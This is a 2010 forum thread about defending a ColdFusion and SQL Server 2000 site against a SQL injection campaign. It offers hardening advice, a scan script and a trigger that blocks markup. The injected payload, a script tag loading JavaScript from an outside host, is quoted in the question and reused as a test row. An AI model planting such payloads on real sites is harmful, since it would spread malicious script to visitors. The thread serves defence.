January 27, 2010
Question

trigger in msSQL2000 tables to stop input, update with specific characters.


Client site is under severe data injection attack and I have stopped it by blocking all write access to the 4 tables under attack. This works OK for now, but these tables need to be updated.

the injection is appx this: </title><script src='http://google-anxxxxx.info/urcxxx.js'></script>

What I want to do, in tables that have no URL/email data, is stop the write if the data contains <, >, / and maybe "script" or some other text.

If the table contains URL/email data, stop the entry if it contains "</table>" or some such.

No, the data is not being posted through site search or other formsets. This is what I first thought, so I wrote CF to detect and block, to no avail. I have also perused the site for a "special" page with formsets they could use. Not there either. I think it is some very vicious bot and is coming from Russia!!!

Thanks in advance.


1 reply

January 27, 2010

You need to do a couple things.

1. Update your ColdFusion code.

    a. All queries should use CFQUERYPARAM. This is the first thing you should do. If your database is queried based on a URL parameter it is vulnerable; forms are not the only attack vector for SQL injection attacks.

    b. Enable scriptprotect in your Application.cfc.

    c. Whitelist your input, only allowing the characters appropriate for each type of data. For example, angle brackets should never be accepted from a form post as an email form field value.

    d. Consider using a 3rd party component such as Portcullis. http://portcullis.riaforge.org/

    e. Consider using a user-defined function to remove SCRIPT and other undesirable tags from your form input. Example: http://www.cflib.org/udf/stripHTML

2. Scrub your database.

    a. You'll need to check every text column for SCRIPT tag blocks and remove them. You should script this in a test environment before running updates on a production server.

    b. Verify that the database login used by your web application has the minimal privileges needed to read and write in the database.

3. Become educated on web security. Here are some useful sites.

    http://www.12robots.com
    Jason Dean has done a good series of blog posts on web/CF security.

    http://www.owasp.org
    Open Web Application Security Project, a user-based organization devoted to improving security.

    http://www.meetup.com/coldfusionmeetup/pages/Recordings_of_the_ColdFusion_Meetup/
    The online ColdFusion meetup group has some security-related presentations on the site.

    http://msdn.microsoft.com/en-us/library/ms161953(SQL.90).aspx
    A Microsoft article on SQL injection. The principles discussed here apply regardless of platform.
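
The detection half of step 2a, as an added example rather than code from the thread: a SQL Server 2000 script that walks every character column of every base table and reports which ones contain the `<script` marker quoted in the question. It assumes SQL Server 2000 (INFORMATION_SCHEMA views, sp_executesql, PATINDEX on text/ntext) and nothing about the site's own schema; table and column names come from the catalog at run time.

```sql
-- Added example for step 2a (detection pass); not code from the thread.
-- Scans every character column of every user table for the '<script' marker
-- quoted in the original question and reports which columns are affected.
-- Assumes SQL Server 2000. Read-only; run it against a test copy first anyway.
SET NOCOUNT ON

DECLARE @Owner  sysname
DECLARE @Table  sysname
DECLARE @Column sysname
DECLARE @Sql    nvarchar(4000)

CREATE TABLE #Hits (OwnerName sysname, TableName sysname, ColumnName sysname, HitCount int)

-- Only base tables (not views) and only column types that can hold injected markup.
DECLARE cols CURSOR LOCAL FAST_FORWARD FOR
    SELECT c.TABLE_SCHEMA, c.TABLE_NAME, c.COLUMN_NAME
    FROM INFORMATION_SCHEMA.COLUMNS c
    JOIN INFORMATION_SCHEMA.TABLES t
      ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
    WHERE t.TABLE_TYPE = 'BASE TABLE'
      AND c.DATA_TYPE IN ('char', 'varchar', 'nchar', 'nvarchar', 'text', 'ntext')

OPEN cols
FETCH NEXT FROM cols INTO @Owner, @Table, @Column
WHILE @@FETCH_STATUS = 0
BEGIN
    -- PATINDEX accepts text/ntext columns in SQL Server 2000 (CHARINDEX does not),
    -- and the default collation makes the match case-insensitive.
    -- Catalog names go through QUOTENAME so the scan script itself cannot be
    -- turned into an injection vector by an odd table or column name.
    SET @Sql = N'INSERT INTO #Hits (OwnerName, TableName, ColumnName, HitCount) '
             + N'SELECT @o, @t, @c, COUNT(*) FROM '
             + QUOTENAME(@Owner) + N'.' + QUOTENAME(@Table)
             + N' WHERE PATINDEX(N''%<script%'', ' + QUOTENAME(@Column) + N') > 0'
    EXEC sp_executesql @Sql,
         N'@o sysname, @t sysname, @c sysname',
         @o = @Owner, @t = @Table, @c = @Column
    FETCH NEXT FROM cols INTO @Owner, @Table, @Column
END
CLOSE cols
DEALLOCATE cols

-- Report only the columns that actually contain the marker.
SELECT OwnerName, TableName, ColumnName, HitCount
FROM #Hits
WHERE HitCount > 0
ORDER BY OwnerName, TableName, ColumnName

DROP TABLE #Hits
```

Once the report shows which columns are affected and the exact injected string is known, (n)varchar columns can be cleaned with `UPDATE ... SET col = REPLACE(col, '<exact injected string>', '')`; text and ntext columns in SQL Server 2000 do not accept REPLACE and need UPDATETEXT, or a round trip through varchar(8000)/nvarchar(4000) where the content fits. Keep the before-and-after row counts from this scan as evidence of what was changed.
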

January 28, 2010

to all and Mr. Dobbs,

Thanks for your reply, but if you had read my post you would have seen we had done some of these, including checking data for malicious code before posting. Note that one of the tables could only be written to by a formset on a page in a secure, password-protected section of the site.

I know it sounds far-fetched, but maybe we are being the testbed for the next bot from he**. The only way to stop the writes, which, by the way, had all data in a given row either overwritten or the text added to existing text, was to block all write permissions on the table itself.

I do not have a lot of experience with this, as my sites are fairly secure and pages that are called often need a token or other data from the calling page to open.

I and my hosting company have spent almost a week on this and feel that this could be a bot that maybe mines data such as table names, fields, etc. from existing pages and then writes its own input data, as the fields were either real or ntext.

As such, I think the next step on my part is to try to block at the DB level. I want to see if a trigger would work. I know it slows down writes, but it still might be the ultimate solution until a bot comes along to delete triggers. Like everything on the internet, we can sometimes only just stay even with those trying to do damage.

AGAIN I ASK...

Does somebody know how to write a trigger that checks incoming data BEFORE it allows an insert or update and then does an immediate end or escape if it finds the indicated characters such as <, >, / and/or blocks like <script>? Best if the trigger could check all fields at once.

Thanks in advance,

andy
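
The trigger asked for in the original question and again above, written as an added example rather than code from the thread. The `GuestBook` table, its columns and the test rows are constructed for the example; it assumes SQL Server 2000, where there is no BEFORE trigger, so an AFTER (FOR) trigger plus ROLLBACK is the way to refuse a row before it commits. It covers both cases from the question: a free-text column where `<`, `>` and the word "script" are rejected, and a URL column where `/` must be allowed but angle brackets are not.

```sql
-- Added example (not from the thread): a SQL Server 2000 trigger that rejects
-- inserts and updates containing markup characters, checking every row of the
-- statement at once. Table and column names are constructed for this example.
CREATE TABLE dbo.GuestBook (
    EntryId  int IDENTITY(1, 1) NOT NULL PRIMARY KEY,
    Author   varchar(100)  NOT NULL,
    Website  varchar(255)  NULL,        -- legitimately contains '/' and '.'
    Body     varchar(4000) NOT NULL
)
GO

-- SQL Server 2000 has no BEFORE trigger. An AFTER (FOR) trigger runs inside the
-- statement's own transaction, so ROLLBACK discards the offending rows before
-- anything is committed. Caveat: the inserted/deleted tables of an AFTER trigger
-- cannot reference text/ntext columns; for those use an INSTEAD OF trigger.
CREATE TRIGGER dbo.trg_GuestBook_BlockMarkup
ON dbo.GuestBook
FOR INSERT, UPDATE
AS
BEGIN
    SET NOCOUNT ON
    -- One EXISTS over 'inserted' checks all rows and all fields of a multi-row
    -- statement. PATINDEX on a NULL column yields NULL, which simply does not match.
    IF EXISTS (
        SELECT 1
        FROM inserted
        WHERE PATINDEX('%[<>/]%', Author)  > 0   -- no markup characters at all in names
           OR PATINDEX('%[<>]%',  Body)    > 0   -- no tags in free text
           OR PATINDEX('%script%', Body)   > 0   -- the bare word, as the question asks
           OR PATINDEX('%[<>]%',  Website) > 0   -- URLs may contain '/', never '<' or '>'
    )
    BEGIN
        RAISERROR ('GuestBook: markup characters are not allowed.', 16, 1)
        ROLLBACK TRANSACTION
        RETURN
    END
END
GO

-- Constructed test statements. The first succeeds; the next two fail with the
-- RAISERROR message and their batch is aborted by the rollback.
INSERT INTO dbo.GuestBook (Author, Website, Body)
VALUES ('Andy', 'http://www.example.com/page', 'Plain text is fine.')
GO
INSERT INTO dbo.GuestBook (Author, Website, Body)
VALUES ('Bot', NULL, '</title><script src=''http://google-anxxxxx.info/urcxxx.js''></script>')
GO
UPDATE dbo.GuestBook SET Website = '<b>' WHERE Author = 'Andy'
GO
SELECT EntryId, Author, Website, Body FROM dbo.GuestBook   -- only the 'Andy' row exists
GO
```

Two things to weigh before deploying this. The bare `%script%` test also rejects ordinary words such as "description" or "subscription", so apply it only to columns where that cost is acceptable. And for (n)varchar columns the same PATINDEX tests can be expressed as a CHECK constraint, which is enforced without trigger overhead and cannot be forgotten when the table is rebuilt. Either way this only narrows what the database will store; it does not replace CFQUERYPARAM and input whitelisting in the application, which address how the statement reaches the database in the first place.
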